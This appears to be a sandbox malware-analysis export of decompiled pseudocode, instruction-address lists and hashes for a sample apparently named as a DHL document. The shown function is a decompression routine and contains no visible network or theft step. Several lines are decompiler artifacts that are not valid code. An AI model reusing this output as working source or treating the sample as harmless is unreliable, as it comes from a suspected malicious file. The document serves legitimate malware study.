												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x004070f0
0x004070f0
0x004070f4
0x00407119
0x00407123
0x00000000
0x004070f6
0x004070f6
0x004070f9
0x004070fd
0x00407100
0x00407103
0x00407107
0x00407107
0x0040710a
0x004071e4
0x004071e4
0x004071eb
0x004071eb
0x004071ee
0x004071f5
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x004071a2
0x004071a2
0x004071a2
0x0040693e
0x0040693e
0x0040693e
0x00406947
0x00000000
0x00000000
0x0040694d
0x00000000
0x00406958
0x00000000
0x00000000
0x00406961
0x00406964
0x00406967
0x0040696b
0x00000000
0x00000000
0x00406971
0x00406974
0x00406976
0x00406977
0x0040697a
0x0040697c
0x0040697d
0x0040697f
0x00406982
0x00406987
0x0040698c
0x00406995
0x004069a8
0x004069ab
0x004069b7
0x004069df
0x004069e1
0x004069ef
0x004069ef
0x004069f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004069e3
0x004069e3
0x004069e6
0x004069e7
0x004069e7
0x00000000
0x004069e3
0x004069bd
0x004069c2
0x004069c2
0x004069cb
0x004069d3
0x004069d6
0x00000000
0x004069dc
0x004069dc
0x00000000
0x004069dc
0x00000000
0x004069f9
0x004069f9
0x004069fd
0x004072a9
0x00000000
0x004072a9
0x00406a06
0x00406a16
0x00406a19
0x00406a1c
0x00406a1c
0x00406a1c
0x00406a1f
0x00406a23
0x00000000
0x00000000
0x00406a25
0x00406a2b
0x00406a55
0x00406a5b
0x00406a62
0x00000000
0x00406a62
0x00406a31
0x00406a34
0x00406a39
0x00406a39
0x00406a44
0x00406a4c
0x00406a4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a94
0x00406a9a
0x00406a9d
0x00406aaa
0x00406ab2
0x00000000
0x00000000
0x00406a69
0x00406a69
0x00406a6d
0x004072b8
0x00000000
0x004072b8
0x00406a79
0x00406a84
0x00406a84
0x00406a84
0x00406a87
0x00406a8a
0x00406a8d
0x00406a92
0x00000000
0x00000000
0x00000000
0x00000000
0x00407129
0x00407129
0x0040712f
0x00407135
0x0040713b
0x00407155
0x00407158
0x0040715e
0x00407169
0x00407169
0x0040716b
0x0040713d
0x0040713d
0x0040714c
0x00407150
0x00407150
0x00407175
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407177
0x0040717b
0x0040732a
0x00000000
0x0040732a
0x00407187
0x0040718e
0x00407196
0x00407199
0x0040719c
0x0040719c
0x00000000
0x00000000
0x00406aba
0x00406abc
0x00406abf
0x00406b30
0x00406b33
0x00406b36
0x00406b3d
0x00406b47
0x00000000
0x00406b47
0x00406ac1
0x00406ac5
0x00406ac8
0x00406aca
0x00406acd
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad7
0x00406adc
0x00406adf
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af7
0x00406afb
0x00406b03
0x00406b03
0x00406b03
0x00406afd
0x00406afd
0x00406afd
0x00406af2
0x00406af2
0x00406af2
0x00406b07
0x00406b0a
0x00406b28
0x00406b2a
0x00000000
0x00406b0c
0x00406b0c
0x00406b0f
0x00406b12
0x00406b15
0x00406b17
0x00406b17
0x00406b17
0x00406b1a
0x00406b1d
0x00406b1f
0x00406b20
0x00406b23
0x00000000
0x00406b23
0x00000000
0x00406d59
0x00406d5d
0x00406d7b
0x00406d7e
0x00406d85
0x00406d88
0x00406d8b
0x00406d8e
0x00406d91
0x00406d94
0x00406d96
0x00406d9d
0x00406d9e
0x00406da0
0x00406da3
0x00406da6
0x00406da9
0x00406da9
0x00406dae
0x00000000
0x00406dae
0x00406d5f
0x00406d62
0x00406d65
0x00406d6f
0x00000000
0x00000000
0x00406dc3
0x00406dc7
0x00406dea
0x00406ded
0x00406df0
0x00406dfa
0x00406dc9
0x00406dc9
0x00406dcc
0x00406dcf
0x00406dd2
0x00406ddf
0x00406de2
0x00406de2
0x00000000
0x00000000
0x00406e06
0x00406e0a
0x00000000
0x00000000
0x00406e10
0x00406e14
0x00000000
0x00000000
0x00406e1a
0x00406e1c
0x00406e20
0x00406e20
0x00406e23
0x00406e27
0x00000000
0x00000000
0x00406e77
0x00406e7b
0x00406e82
0x00406e85
0x00406e88
0x00406e92
0x00000000
0x00406e92
0x00406e7d
0x00000000
0x00000000
0x00406e9e
0x00406ea2
0x00406ea9
0x00406eac
0x00406eaf
0x00406ea4
0x00406ea4
0x00406ea4
0x00406eb2
0x00406eb5
0x00406eb8
0x00406eb8
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec1
0x00406ec4
0x00406ecb
0x00406ed0
0x00000000
0x00000000
0x00406f5e
0x00406f5e
0x00406f62
0x00407300
0x00000000
0x00407300
0x00406f68
0x00406f6b
0x00406f6e
0x00406f72
0x00406f75
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f7d
0x00406f80
0x00406f83
0x00000000
0x00000000
0x00406b53
0x00406b53
0x00406b57
0x004072c4
0x00000000
0x004072c4
0x00406b5d
0x00406b60
0x00406b63
0x00406b67
0x00406b6a
0x00406b70
0x00406b72
0x00406b72
0x00406b72
0x00406b75
0x00406b78
0x00406b78
0x00406b7b
0x00406b7e
0x00000000
0x00000000
0x00406b84
0x00406b8a
0x00000000
0x00000000
0x00406b90
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00406ba0
0x00406ba1
0x00406ba4
0x00406ba6
0x00406bac
0x00406baf
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbe
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406bea
0x00406bee
0x00406bf0
0x00406bf4
0x00406bc0
0x00406bc0
0x00406bc4
0x00406bcc
0x00406bd1
0x00406bd3
0x00406bd5
0x00406bd5
0x00406bf7
0x00406bfe
0x00406c01
0x00000000
0x00406c07
0x00000000
0x00406c07
0x00000000
0x00406c0c
0x00406c0c
0x00406c10
0x004072d0
0x00000000
0x004072d0
0x00406c16
0x00406c19
0x00406c1c
0x00406c20
0x00406c23
0x00406c29
0x00406c2b
0x00406c2b
0x00406c2b
0x00406c2e
0x00406c31
0x00406c31
0x00406c31
0x00406c37
0x00000000
0x00000000
0x00406c39
0x00406c3c
0x00406c3f
0x00406c42
0x00406c45
0x00406c48
0x00406c4b
0x00406c4e
0x00406c51
0x00406c54
0x00406c57
0x00406c6f
0x00406c72
0x00406c75
0x00406c78
0x00406c78
0x00406c7b
0x00406c7f
0x00406c81
0x00406c59
0x00406c59
0x00406c61
0x00406c66
0x00406c68
0x00406c6a
0x00406c6a
0x00406c84
0x00406c8b
0x00406c8e
0x00000000
0x00406c90
0x00000000
0x00406c90
0x00406c8e
0x00406c95
0x00406c95
0x00406c95
0x00406c95
0x00000000
0x00000000
0x00406cd0
0x00406cd0
0x00406cd4
0x004072dc
0x00000000
0x004072dc
0x00406cda
0x00406cdd
0x00406ce0
0x00406ce4
0x00406ce7
0x00406ced
0x00406cef
0x00406cef
0x00406cef
0x00406cf2
0x00406cf5
0x00406cf5
0x00406cfb
0x00406c99
0x00406c99
0x00406c9c
0x00000000
0x00406c9c
0x00406cfd
0x00406cfd
0x00406d00
0x00406d03
0x00406d06
0x00406d09
0x00406d0c
0x00406d0f
0x00406d12
0x00406d15
0x00406d18
0x00406d1b
0x00406d33
0x00406d36
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d43
0x00406d45
0x00406d1d
0x00406d1d
0x00406d25
0x00406d2a
0x00406d2c
0x00406d2e
0x00406d2e
0x00406d48
0x00406d4f
0x00406d52
0x00000000
0x00406d54
0x00000000
0x00406d54
0x00000000
0x00406fe1
0x00406fe1
0x00406fe5
0x0040730c
0x00000000
0x0040730c
0x00406feb
0x00406fee
0x00406ff1
0x00406ff5
0x00406ff8
0x00406ffe
0x00407000
0x00407000
0x00407000
0x00407003
0x00000000
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00407126
0x00407126
0x00000000
0x00000000
0x00000000
0x00000000
0x004071ad
0x004071b1
0x004071cf
0x004071cf
0x004071cf
0x004071d6
0x004071dd
0x00000000
0x004071dd
0x004071b3
0x004071b6
0x004071b9
0x004071bc
0x004071c3
0x00000000
0x00000000
0x0040729e
0x004072a1
0x004071a2
0x004071a2
0x00000000
0x00000000
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00000000
0x00000000
0x00406eef
0x00406ef2
0x00406ef5
0x00406ef7
0x00406ef9
0x00406ef9
0x00406efa
0x00406efd
0x00406f04
0x00406f07
0x00406f15
0x00000000
0x00000000
0x00000000
0x00000000
0x004071fa
0x004071fa
0x004071fe
0x00407336
0x00000000
0x00407336
0x00407204
0x00407207
0x0040720a
0x0040720e
0x00407211
0x00407217
0x00407219
0x00407219
0x00407219
0x0040721c
0x0040721f
0x0040721f
0x0040721f
0x0040721f
0x00000000
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e2e
0x004072f4
0x00000000
0x004072f4
0x00406e34
0x00406e37
0x00406e3a
0x00406e3d
0x00406e3f
0x00406e3f
0x00406e3f
0x00406e42
0x00406e45
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e52
0x00406e54
0x00406e54
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e60
0x00406e60
0x00406e63
0x00406e65
0x00406e65
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00406e68
0x00406e68
0x00000000
0x00406e68
0x004070e9
0x0040731e
0x00407340
0x00407346
0x00407348
0x0040734f
0x00407351
0x00407358
0x0040735c
0x00000000
0x0040694d
0x00407355
0x00407355
0x00000000
0x00407355
0x004071a2
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x0040727f
0x00000000
0x004070f4

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
Instruction ID: 81ced8d75bd8cd674d530aa485ef516b0f39a629971cfce93107e9c84bdcedbb
Opcode Fuzzy Hash: f289ec4eae441b973c5cf469eb2209b78d92787f90c2f70d8ea77383fdb072af
Instruction Fuzzy Hash: 4E912170E04228CBDF28CFA8C8547ADBBB1FB44305F14816ED856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E06 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E06() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040735D))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
